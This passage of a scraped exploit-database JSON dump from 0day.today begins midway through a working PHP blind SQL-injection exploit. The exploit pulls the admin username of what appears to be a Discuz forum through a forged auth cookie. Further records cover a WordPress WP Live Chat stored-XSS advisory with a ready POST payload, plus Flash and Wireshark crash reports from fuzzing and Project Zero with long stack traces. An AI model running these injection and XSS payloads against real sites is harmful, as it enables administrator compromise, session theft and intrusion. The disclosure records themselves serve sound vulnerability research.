\";\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $admin.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n if ($i==255) {die(\"\\nExploit failed...\");}\r\n }\r\n$j++;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\nif (is_hash($password)) {\r\n echo \"exploit succeeded...\";\r\n}\r\nelse {\r\n echo \"exploit failed...\";\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "a157c0292bdbff9153ca5d2697ef01d5", "key": "href"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "modified"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "f649337c7944d009543cb7cfe1e708dc", "key": "sourceData"}, {"hash": "85bcd23249d49a79acd67764266b3a3a", "key": "sourceHref"}, {"hash": "75b2b48779bc28cd5ace195aa1786129", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"result": {"zdt": [{"lastseen": "2018-01-05T13:19:42", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-06-28T00:00:00", "type": "zdt", "title": "Adobe Flash - ATF Parser Heap Corruption Exploit", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-3078"], "modified": "2017-06-28T00:00:00", "href": "https://0day.today/exploit/description/28033", "id": "1337DAY-ID-28033", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1216\r\n \r\nThe attached file causes heap corruption in the ATF parser. To reproduce the issue, copy atffree.atf and LoadImage.swf to a server, and visit http://127.0.0.1/LoadImage.swf?img=atffree.png.\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28033", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-10T07:42:08", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "OSS-Fuzz", "published": "2017-06-06T00:00:00", "type": "zdt", "title": "Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9347"], "modified": "2017-06-06T00:00:00", "href": "https://0day.today/exploit/description/27901", "id": "1337DAY-ID-27901", "sourceData": "Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637\r\n \r\nBuild Information:\r\nTShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)\r\n \r\nCopyright 1998-2017 Gerald Combs <[email\u00a0protected]> and contributors.\r\nLicense GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>\r\nThis is free software; see the source for copying conditions. There is NO\r\nwarranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n \r\nCompiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,\r\nwith GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua\r\n5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,\r\nwith nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.\r\n \r\nRunning on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz\r\n(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap\r\nversion 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.\r\n \r\nBuilt using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).\r\n--\r\nA problem was found by the oss-fuzz project:\r\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216\r\n \r\nAttached is the sample that triggers this error which can be reproduced with an\r\nASAN+UBSAN build of Wireshark (\"tshark -Vr test.pcap\").\r\n--\r\nepan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null\r\n/usr/include/string.h:395:33: note: nonnull attribute specified here\r\n #0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50\r\n #1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23\r\n #2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49\r\n #3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13\r\n #4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18\r\n #5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9\r\n #6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17\r\n #7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12\r\n #8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21\r\n #9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12\r\n #10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9\r\n #11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13\r\n #12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5\r\n #13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9\r\n #17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13\r\n #18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9\r\n #19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13\r\n #20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7\r\n #24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10\r\n #25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9\r\n #29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21\r\n #30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8\r\n #33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8\r\n #34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5\r\n #35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5\r\n #36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8\r\n #39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11\r\n #40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8\r\n #41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9\r\n #42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8\r\n #43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8\r\n #44 0x7fb58947a694 in dissect_record epan/packet.c:567:3\r\n #45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2\r\n #46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5\r\n #47 0x564f1828009e in load_cap_file tshark.c:3232:11\r\n #48 0x564f18277e7b in main tshark.c:1954:13\r\n #49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)\r\n #50 0x564f18165709 in _start (run/tshark+0xd1709)\r\n \r\nSUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27901", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-01T23:44:02", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "Dennis Kerdijk", "published": "2016-08-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "WordPress WP Live Chat Support 6.2.03 Plugin - Persistent Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-08-01T00:00:00", "id": "1337DAY-ID-25206", "href": "https://0day.today/exploit/description/25206", "sourceData": "Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin\r\n \r\nAbstract\r\n \r\nA stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0010\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.\r\n \r\nFix\r\n \r\nThis issue is resolved in WP Live Chat Support version 6.2.04.\r\n \r\nIntroduction\r\n \r\nWP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\n \r\nThe vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):\r\n \r\nwp-live-chat-support/wp-live-chat-support.php:\r\n \r\n600 if ($_POST['action'] == \"wplc_user_send_offline_message\") {\r\n601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }\r\n602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }\r\n603 do_action(\"wplc_hook_offline_message\",array(\r\n604 \"cid\"=>$_POST['cid'],\r\n605 \"name\"=>$_POST['name'],\r\n606 \"email\"=>$_POST['email'],\r\n607 \"url\"=>get_site_url(),\r\n608 \"msg\"=>$_POST['msg']\r\n609 )\r\n610 );\r\n611 }\r\n \r\nwp-live-chat-support/functions.php:\r\n \r\n1206 function wplc_store_offline_message($name, $email, $message){\r\n1207 global $wpdb;\r\n1208 global $wplc_tblname_offline_msgs;\r\n1209 \r\n1210 $wplc_settings = get_option('WPLC_SETTINGS');\r\n1211 \r\n1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){\r\n1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {\r\n1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n1215 } else {\r\n1216 $ip_address = $_SERVER['REMOTE_ADDR'];\r\n1217 }\r\n1218 $offline_ip_address = $ip_address;\r\n1219 } else {\r\n1220 $offline_ip_address = \"\";\r\n1221 }\r\n1222 \r\n1223 \r\n1224 $ins_array = array(\r\n1225 'timestamp' => current_time('mysql'),\r\n1226 'name' => $name,\r\n1227 'email' => $email,\r\n1228 'message' => $message,\r\n1229 'ip' => $offline_ip_address,\r\n1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']\r\n1231 );\r\n1232 \r\n1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );\r\n1234 return;\r\n1235 }\r\n \r\nThe vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present.\r\n \r\nProof of concept\r\n \r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: <target>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 361\r\nConnection: close\r\n \r\naction=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25206"}, {"lastseen": "2018-01-10T03:17:02", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-04-29T00:00:00", "type": "zdt", "title": "Wireshark - alloc_address_wmem Assertion Failure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-29T00:00:00", "href": "https://0day.today/exploit/description/25985", "id": "1337DAY-ID-25985", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=804\r\n \r\nThe following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\nERROR:./address.h:144:alloc_address_wmem: assertion failed: (addr_data == NULL)\r\n \r\nProgram received signal SIGABRT, Aborted.\r\n0x00007fffe13f5cc9 in __GI_raise ([email\u00a0protected]=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56\r\n56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.\r\n(gdb) where\r\n#0 0x00007fffe13f5cc9 in __GI_raise ([email\u00a0protected]=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56\r\n#1 0x00007fffe13f90d8 in __GI_abort () at abort.c:89\r\n#2 0x00007fffe2e8c165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0\r\n#3 0x00007fffe2e8c1fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0\r\n#4 0x00007fffeabea578 in alloc_address_wmem (scope=0x60700000c110, addr=0x7ffe9039af00, addr_type=22, \r\n addr_len=0, addr_data=0x7ffe9039acb0) at ./address.h:144\r\n#5 0x00007fffeabe3454 in copy_address_wmem (scope=0x60700000c110, to=0x7ffe9039af00, from=0x7ffe9039a920)\r\n at ./address.h:254\r\n#6 0x00007fffeabe2ec7 in conversation_new (setup_frame=10, addr1=0x7ffe9039a8e8, addr2=0x7ffe9039a920, \r\n ptype=PT_NONE, port1=0, port2=0, options=2) at conversation.c:701\r\n#7 0x00007fffebfe61a8 in get_peer_conversation (pinfo=0x61400000f058, tpt_conv_data=0x7ffe9039a8c0, create=1)\r\n at packet-jxta.c:800\r\n#8 0x00007fffebfda23d in dissect_jxta_stream (tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffff5f30) at packet-jxta.c:682\r\n#9 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:656\r\n#10 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffff5f30) at packet.c:731\r\n#11 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:2764\r\n#12 0x00007fffeabe9336 in try_conversation_dissector (addr_a=0x61400000f118, addr_b=0x61400000f130, \r\n ptype=PT_TCP, port_a=32925, port_b=9711, tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffff5f30) at conversation.c:1323\r\n#13 0x00007fffecd90b6b in decode_tcp_ports (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, src_port=32925, dst_port=9711, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30)\r\n at packet-tcp.c:4981\r\n#14 0x00007fffecd96f1b in process_tcp_payload (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, src_port=32925, dst_port=9711, seq=145, nxtseq=3338, \r\n is_tcp_segment=1, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30) at packet-tcp.c:5085\r\n#15 0x00007fffecd91fcc in dissect_tcp_payload (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, offset=32, seq=145, \r\n nxtseq=3338, sport=32925, dport=9711, tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, tcpd=0x7ffe9039a3c0, \r\n tcpinfo=0x7fffffff5f30) at packet-tcp.c:5166\r\n#16 0x00007fffecda8229 in dissect_tcp (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7ffe8ff93880) at packet-tcp.c:6071\r\n#17 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7ffe8ff93880) at packet.c:656\r\n#18 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:731\r\n#19 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000093c40, uint_val=6, tvb=0x61d0001a6ed0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:1190\r\n#20 0x00007fffebe8733c in ip_try_dissect (heur_first=0, tvb=0x61d0001a6ed0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, iph=0x7ffe8ff93880) at packet-ip.c:1977\r\n#21 0x00007fffebe9214a in dissect_ip_v4 (tvb=0x61d0001a6140, pinfo=0x61400000f058, parent_tree=0x6190001500a0, \r\n data=0x0) at packet-ip.c:2476\r\n#22 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x0) at packet.c:656\r\n#23 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:731\r\n#24 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000052380, uint_val=2048, \r\n tvb=0x61d0001a6140, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:1190\r\n#25 0x00007fffeac548f5 in dissector_try_uint (sub_dissectors=0x61d000052380, uint_val=2048, tvb=0x61d0001a6140, \r\n pinfo=0x61400000f058, tree=0x6190001500a0) at packet.c:1216\r\n#26 0x00007fffeb97476a in dissect_ethertype (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n data=0x7fffffffa080) at packet-ethertype.c:257\r\n#27 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:656\r\n#28 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffa080) at packet.c:731\r\n#29 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2764\r\n#30 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2777\r\n#31 0x00007fffecb24cac in dissect_sll (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n---Type <return> to continue, or q <return> to quit---\r\n data=0x61300000df08) at packet-sll.c:291\r\n#32 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x61300000df08) at packet.c:656\r\n#33 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08) at packet.c:731\r\n#34 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000051a40, uint_val=25, \r\n tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08)\r\n at packet.c:1190\r\n#35 0x00007fffeba65106 in dissect_frame (tvb=0x61d0001a74c0, pinfo=0x61400000f058, parent_tree=0x6190001500a0, \r\n data=0x7fffffffc560) at packet-frame.c:492\r\n#36 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:656\r\n#37 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffc560) at packet.c:731\r\n#38 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2764\r\n#39 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2777\r\n#40 0x00007fffeac4ecd5 in dissect_record (edt=0x61400000f040, file_type_subtype=1, phdr=0x61300000dea0, \r\n tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at packet.c:539\r\n#41 0x00007fffeac01dba in epan_dissect_run_with_taps (edt=0x61400000f040, file_type_subtype=1, \r\n phdr=0x61300000dea0, tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at epan.c:376\r\n#42 0x000000000052ef40 in process_packet (cf=0x14b82e0 <cfile>, edt=0x61400000f040, offset=2804, \r\n whdr=0x61300000dea0, pd=0x6210000fb500 \"\\300\", tap_flags=0) at tshark.c:3727\r\n#43 0x000000000052830d in load_cap_file (cf=0x14b82e0 <cfile>, save_file=0x0, out_file_type=2, \r\n out_file_name_res=0, max_packet_count=-9, max_byte_count=0) at tshark.c:3483\r\n#44 0x000000000051e67d in main (argc=3, argv=0x7fffffffe268) at tshark.c:2192\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12354. Attached are two files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39749.zip\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/25985", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-20T05:20:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-04-29T00:00:00", "title": "Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-29T00:00:00", "href": "https://0day.today/exploit/description/25986", "id": "1337DAY-ID-25986", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=802\r\n \r\nThe following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==27389==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e9e9a68 at pc 0x7fa9c4c2d7a3 bp 0x7fff6e9e96b0 sp 0x7fff6e9e96a8\r\nWRITE of size 8 at 0x7fff6e9e9a68 thread T0\r\n #0 0x7fa9c4c2d7a2 in dissect_2008_16_security_4 wireshark/epan/dissectors/packet-dof.c:2662:32\r\n #1 0x7fa9c4c2e3f6 in dof_dissect_pdu wireshark/epan/dissectors/packet-dof.c:12619:16\r\n #2 0x7fa9c4c2ce35 in dof_dissect_pdu_as_field wireshark/epan/dissectors/packet-dof.c:12613:20\r\n #3 0x7fa9c4c2a7ed in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8929:26\r\n #4 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #5 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #6 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #7 0x7fa9c4c68aca in dissect_app_common wireshark/epan/dissectors/packet-dof.c:5405:13\r\n #8 0x7fa9c4c658b6 in dissect_dpp_2 wireshark/epan/dissectors/packet-dof.c:7370:27\r\n #9 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #10 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #11 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #12 0x7fa9c4c3a7a2 in dof_dissect_dpp_common wireshark/epan/dissectors/packet-dof.c:5490:13\r\n #13 0x7fa9c4c5d5c0 in dissect_dnp_1 wireshark/epan/dissectors/packet-dof.c:6676:23\r\n #14 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #15 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #16 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #17 0x7fa9c4c39598 in dof_dissect_dnp_common wireshark/epan/dissectors/packet-dof.c:5528:9\r\n #18 0x7fa9c4c390a0 in dissect_dof_common wireshark/epan/dissectors/packet-dof.c:5627:5\r\n #19 0x7fa9c4c59e5c in dissect_dof_udp wireshark/epan/dissectors/packet-dof.c:5864:12\r\n #20 